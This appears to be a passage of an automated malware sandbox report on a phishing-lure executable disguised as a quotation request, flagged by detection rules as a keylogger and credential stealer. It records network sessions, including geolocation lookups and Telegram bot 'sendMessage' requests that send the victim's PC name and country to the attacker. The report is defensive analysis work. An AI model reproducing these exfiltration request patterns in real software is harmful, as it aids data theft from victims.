                                                                                                            2024-11-20 08:33:14 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.549731188.114.96.34435268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:14 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:14 UTC846INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:14 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55503
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g30U7DR9IfgEfrMOPcrQHLfgnFQqDxmKFNSQ3JzwY7770w8Q%2Fhb7dPk2vM7QFWnMPbtl65qlV3p04YIRnhko7KYgZfMBuOPtE5IqqCYyOCtF2XnmeK9q61ALEgDD296kvbeo6xov"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e571811bc1f72b1-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1969&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1446977&cwnd=167&unsent_bytes=0&cid=3f31458dd99a9b10&ts=144&x=0"
                                                                                                            2024-11-20 08:33:14 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.549734188.114.96.34436448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:15 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2024-11-20 08:33:15 UTC852INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:15 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55504
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DOa8OBDi3Xs1d8F8iqIsb%2FeAI6txjY4h4X71oaTK3fZigrZa3g1F3c0IwimjzgzXDBfygcMZhXhwLn8EdikwJM0SXJYk4%2BtJ8%2FQAI%2FI3vDYZMMMJ4YWFYkuX7eZ8hsef9vmIgDSg"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e571816aeb9428e-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1670&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1692753&cwnd=222&unsent_bytes=0&cid=a11f3d3102fd6d24&ts=141&x=0"
                                                                                                            2024-11-20 08:33:15 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.549735188.114.96.34435268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:15 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2024-11-20 08:33:15 UTC860INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:15 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55504
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9a6ilbU0%2F3r3c5vlsatX0YRuCOWV4JWx1QlVBBJMpxEzWO%2BkCJbt0eHf6%2ByutohxpXfDw9q6gNoOIJ4qHqh9jbXnqpNqkIX%2Ft%2FK0tFo%2FIMleYs6%2F5BrtuG5Ab6Ob9R8Rr%2BQUDvj"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e5718196e351835-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1529&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1902280&cwnd=126&unsent_bytes=0&cid=c3af681d131cf5c5&ts=173&x=0"
                                                                                                            2024-11-20 08:33:15 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.549738188.114.96.34436448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:16 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:16 UTC852INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:16 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55505
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=spIzaFHBA2180di%2FueIZmEYQPA0oJoRqmdgA3DnC5%2BphndBku1PfMjzd6BxTXbBCvnw9C3NrddIhxp7%2FDYvbvWx%2FVXstyM2NLrs9NZ0NNKuW9TDpdVfcOdnSHNUzJu1ZlTZJfUSK"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e57181e6f32433e-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1571&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1812538&cwnd=248&unsent_bytes=0&cid=14d0847f30fd2950&ts=165&x=0"
                                                                                                            2024-11-20 08:33:16 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.549737149.154.167.2204435268C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:16 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                            Host: api.telegram.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:16 UTC344INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Wed, 20 Nov 2024 08:33:16 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 55
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-20 08:33:16 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.549740188.114.96.34436448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:17 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2024-11-20 08:33:17 UTC856INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:17 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55506
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pR73j%2FPCbTQw5CW%2BrIFZVcTfLN%2BQ1ka2%2FMhqIBu1KKYCO3zWEKexnqsND58CmTMLmmSaG9aCYOOvxXgEm3h%2B%2FaaSbchWy2fsf7JweUtVTunehfDIVxkwx4pjsHSN3pKLUwarzFAU"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e571825de934277-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2486&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1161957&cwnd=191&unsent_bytes=0&cid=c44f5daa9c0c48c6&ts=138&x=0"
                                                                                                            2024-11-20 08:33:17 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.549745188.114.96.34436448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:18 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2024-11-20 08:33:19 UTC856INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:19 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55508
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BP%2BpmpbYEhJsW1tOBbNe67VhAFflxEYnkH6vsyu23gghXSpR%2FWe0mI3vsRLeI76Ylzw2%2FYGoCkCgQhOluPL1%2BSNn8JXInq8Ikm7MqISNkMzrHZXcBWuUJ8u4%2BFD7BJ0DzwchWjqq"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e57182e4f79c359-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1711606&cwnd=232&unsent_bytes=0&cid=142f9f3a0feab12b&ts=267&x=0"
                                                                                                            2024-11-20 08:33:19 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.549760188.114.96.34436448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:20 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2024-11-20 08:33:20 UTC856INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 08:33:20 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 55509
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HsxUXqwoP%2FS1WGQo%2BG1MXuMM8rXcqa9lZuzSk66XKbGS8AumnEHtu5AsTFMiBtFJALUntJT0w4%2FKoTGSYq3%2FzmgmQ%2BrXuItv%2F3nNsjmQk3NjWEWQTccY9De4EWDADjUnH7aTKp2"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e5718367d6072b9-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1970&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1442687&cwnd=241&unsent_bytes=0&cid=61caa62a70c540dd&ts=251&x=0"
                                                                                                            2024-11-20 08:33:20 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.549767149.154.167.2204436448C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 08:33:21 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                            Host: api.telegram.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 08:33:21 UTC344INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Wed, 20 Nov 2024 08:33:21 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 55
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-20 08:33:21 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:03:32:59
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
                                                                                                            Imagebase:0x5d0000
                                                                                                            File size:787'968 bytes
                                                                                                            MD5 hash:7B5985233FAF11890E9CF4C7B579983B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:03:33:02
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
